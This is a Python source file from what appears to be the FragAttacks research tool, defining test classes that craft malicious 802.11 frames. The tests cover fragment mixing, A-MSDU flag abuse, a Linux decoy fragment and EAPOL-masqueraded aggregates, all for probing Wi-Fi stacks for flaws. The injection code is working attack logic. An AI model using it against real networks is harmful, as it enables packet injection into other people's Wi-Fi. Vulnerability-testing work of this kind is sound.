fragattacks/research/tests_common.py

257 lines
8.8 KiB
Python
Raw Normal View History

2020-06-28 04:35:45 -04:00
# Copyright (c) 2020, Mathy Vanhoef <mathy.vanhoef@nyu.edu>
#
# This code may be distributed under the terms of the BSD license.
# See README for more details.
2020-05-28 09:10:37 -04:00
from fraginternals import *
2020-06-13 12:37:16 -04:00
import copy
2020-05-28 09:10:37 -04:00
class PingTest(Test):
def __init__(self, ptype, fragments, separate_with=None, opt=None):
super().__init__(fragments)
self.ptype = ptype
self.separate_with = separate_with
self.bcast_ra = False if opt == None else opt.bcast_ra
self.bcast_dst = False if opt == None else opt.bcast_dst
2020-05-28 09:10:37 -04:00
self.as_msdu = False if opt == None else opt.as_msdu
self.icmp_size = None if opt == None else opt.icmp_size
self.padding = None if opt == None else opt.padding
self.to_self = False if opt == None else opt.to_self
self.bad_mic = False if opt == None else opt.bad_mic
self.dport = None if opt == None else opt.udp
2020-05-28 09:10:37 -04:00
self.parse_meta_actions()
def parse_meta_actions(self):
# Create list of fragment numbers to be used
self.fragnums = []
next_fragnum = 0
for act in self.actions:
if act.is_meta(Action.MetaDrop):
next_fragnum += 1
elif act.action == Action.Inject:
self.fragnums.append(next_fragnum)
next_fragnum += 1
self.actions = list(filter(lambda act: not act.is_meta(Action.MetaDrop), self.actions))
2020-05-28 09:10:37 -04:00
def prepare(self, station):
log(STATUS, "Generating ping test", color="green")
# Generate the header and payload
2020-08-04 16:35:24 -04:00
header, request, check_fn = generate_request(station, self.ptype, icmp_size=self.icmp_size, \
padding=self.padding, to_self=self.to_self, dport=self.dport)
# We can automatically detect the result if the last fragment was sent after a connected event.
# Note we might get a reply during a rekey handshake, and this will be handled properly.
if any([act.trigger >= Action.AfterAuth for act in self.actions]):
self.check_fn = check_fn
2020-05-28 09:10:37 -04:00
if self.as_msdu == 1:
# Set the A-MSDU frame type flag in the QoS header
header.Reserved = 1
# Encapsulate the request in an A-MSDU payload
request = create_msdu_subframe(station.mac, station.get_peermac(), request)
elif self.as_msdu == 2:
# Set A-MSDU flag but include a normal payload (fake A-MSDU)
header.Reserved = 1
# Generate all the individual (fragmented) frames
num_frags = len(self.get_actions(Action.Inject))
frames = create_fragments(header, request, num_frags)
# Assign frames to the existing fragment objects
for frag, frame in zip(self.get_actions(Action.Inject), frames):
if self.bcast_ra:
2020-05-28 09:10:37 -04:00
frame.addr1 = "ff:ff:ff:ff:ff:ff"
if self.bcast_dst:
if header.FCfield & Dot11(FCfield="to-DS").FCfield != 0:
frame.addr3 = "ff:ff:ff:ff:ff:ff"
else:
frame.addr1 = "ff:ff:ff:ff:ff:ff"
2020-05-28 09:10:37 -04:00
# Assign fragment numbers according to MetaDrop rules
frame.SC = (frame.SC & 0xfff0) | self.fragnums.pop(0)
2020-05-28 09:10:37 -04:00
frag.frame = frame
# Take into account encryption options
frag.bad_mic = self.bad_mic
2020-05-28 09:10:37 -04:00
# Put the separator after each fragment if requested.
if self.separate_with != None:
for i in range(len(self.actions) - 1, 0, -1):
# Check if the previous action is indeed an injection
prev_frag = self.actions[i - 1]
if prev_frag.action != Action.Inject:
continue
# Create a similar inject action for the seperator
sep_frag = Action(prev_frag.trigger, enc=prev_frag.encrypted)
sep_frag.frame = self.separate_with.copy()
station.set_header(sep_frag.frame)
self.actions.insert(i, sep_frag)
class ForwardTest(Test):
2020-06-13 12:37:16 -04:00
def __init__(self, eapol=False, dst=None, large=False):
actions = [Action(Action.Connected, enc=True)]
if eapol:
actions = [Action(Action.StartAuth, enc=False)]
if large:
actions += copy.deepcopy(actions)
super().__init__(actions)
self.eapol = eapol
self.dst = dst
self.large = large
2020-05-28 09:10:37 -04:00
self.magic = b"forwarded_data"
def prepare(self, station):
2020-06-13 12:37:16 -04:00
# Construct the header of the frame
2020-05-28 09:10:37 -04:00
header = station.get_header(prior=2)
if header.FCfield & Dot11(FCfield="to-DS").FCfield == 0:
2020-06-13 12:37:16 -04:00
log(ERROR, "It makes no sense to test whether a client forwards frames??")
if self.dst == None:
header.addr3 = station.mac
self.check_fn = lambda p: self.magic in raw(p)
else:
header.addr3 = self.dst
# Determine the type of data to send
if self.eapol:
request = LLC()/SNAP()/EAPOL()/Raw(self.magic)
else:
request = LLC()/SNAP()/IP()/Raw(self.magic)
# Wether to send large requests --- TODO FIXME ath9k_htc cannot reliably send large frames...
2020-06-13 12:37:16 -04:00
if self.large:
request = request/Raw(b"A" * 1500)
# Create the actual frame(s)
frames = create_fragments(header, request, len(self.actions))
for frag, frame in zip(self.get_actions(Action.Inject), frames):
frag.frame = frame
2020-05-28 09:10:37 -04:00
class LinuxTest(Test):
def __init__(self, ptype, decoy_tid=None):
super().__init__([
# Note: to inject immediately after 4-way provide IPs using --ip and --peerip
Action(Action.Connected, Action.GetIp),
Action(Action.Connected, enc=True),
Action(Action.Connected, enc=True),
Action(Action.Connected, enc=False)
])
self.ptype = ptype
self.decoy_tid = decoy_tid
def prepare(self, station):
header, request, self.check_fn = generate_request(station, self.ptype)
frag1, frag2 = create_fragments(header, request, 2)
# Fragment 1: normal
self.actions[0].frame = frag1
# Fragment 2: make Linux update latest used crypto Packet Number. Use a dummy packet
# that can't accidently aggregate with the first fragment in a corrrect packet.
2020-08-04 23:17:59 -04:00
p = station.get_header(prior=2)/LLC()/SNAP()/IP()/Raw(b"linux-plain decoy fragment")
2020-05-28 09:10:37 -04:00
p.SC = frag2.SC ^ (1 << 4)
# - In the attack against Linux, the decoy frame must have the same QoS TID.
# - On the other hand, some devices seem to only cache fragments for one sequence
# number per QoS priority. So to avoid overwriting the first fragment, add this
# option to use a different priority for it.
p.TID = 2
if self.decoy_tid != None:
p.TID = 3
self.actions[1].frame = p
# Fragment 3: can now inject last fragment as plaintext
self.actions[2].frame = frag2
class EapolTest(Test):
# TODO:
# Test 1: plain unicast EAPOL fragment, plaintext broadcast frame => trivial frame injection
# Test 2: plain unicast EAPOL fragment, encrypted broadcast frame => just an extra test
# Test 3: plain unicast EAPOL fragment, encrypted unicast fragment => demonstrates mixing of plain/encrypted fragments
# Test 4: EAPOL and A-MSDU tests?
def __init__(self):
super().__init__([
Action(Action.BeforeAuth, enc=False),
Action(Action.BeforeAuth, enc=False)
])
def prepare(self, station):
header = station.get_header(prior=2)
request = LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A"*32)
frag1, frag2 = create_fragments(header, data=request, num_frags=2)
frag1copy, frag2copy = create_fragments(header, data=request, num_frags=2)
frag1copy.addr1 = "ff:ff:ff:ff:ff:ff"
frag2copy.addr1 = "ff:ff:ff:ff:ff:ff"
self.actions[0].frame = frag1
self.actions[0].frame = frag2
class EapolAmsduTest(Test):
"""
TODO: Combine this class with PingTest so we have more advanced argument handling
"""
def __init__(self, ptype, actions, freebsd=False, opt=None):
2020-05-28 09:10:37 -04:00
super().__init__(actions)
self.ptype = ptype
self.freebsd = freebsd
self.bcast_dst = False if opt == None else opt.bcast_dst
#TODO: More automatically control ptype and its arguments
self.dport = None if opt == None else opt.udp
actions = self.get_actions(Action.Inject)
if len(actions) != 1:
log(ERROR, f"eapol-amsdu: invalid arguments, should only give 1 inject action (gave {len(actions)}).")
quit(1)
2020-05-28 09:10:37 -04:00
def prepare(self, station):
log(STATUS, "Generating ping test", color="green")
# Generate the single frame
header, request, check_fn = generate_request(station, self.ptype, dport=self.dport)
2020-05-28 09:10:37 -04:00
# Set the A-MSDU frame type flag in the QoS header
header.Reserved = 1
2020-08-04 16:35:24 -04:00
# We can automatically detect the result if the last fragment was sent after a connected event.
# Note we might get a reply during a rekey handshake, and this will be handled properly.
if any([act.trigger >= Action.AfterAuth for act in self.actions]):
self.check_fn = check_fn
mac_src = station.mac
mac_dst = station.get_peermac()
if self.bcast_dst:
mac_dst = "ff:ff:ff:ff:ff:ff"
2020-05-28 09:10:37 -04:00
# Masquerade A-MSDU frame as an EAPOL frame
if self.freebsd:
log(STATUS, "Creating malformed EAPOL/MSDU that FreeBSD/Linux/.. treats as valid")
request = freebsd_create_eapolmsdu(mac_src, mac_dst, request)
2020-05-28 09:10:37 -04:00
else:
request = LLC()/SNAP()/EAPOL()/Raw(b"\x00\x06AAAAAA") / create_msdu_subframe(mac_src, mac_dst, request)
2020-05-28 09:10:37 -04:00
frames = create_fragments(header, request, 1)
toinject = frames[0]
# Make sure addr1/3 matches the destination address in the A-MSDU subframe(s)
if self.bcast_dst:
if toinject.FCfield & Dot11(FCfield="to-DS").FCfield != 0:
toinject.addr3 = "ff:ff:ff:ff:ff:ff"
else:
toinject.addr1 = "ff:ff:ff:ff:ff:ff"
2020-05-28 09:10:37 -04:00
# Note: previously I also sent an Auth to 00:..:55 but that doesn't seem to be needed.
actions = self.get_actions(Action.Inject)
actions[0].frame = toinject
2020-05-28 09:10:37 -04:00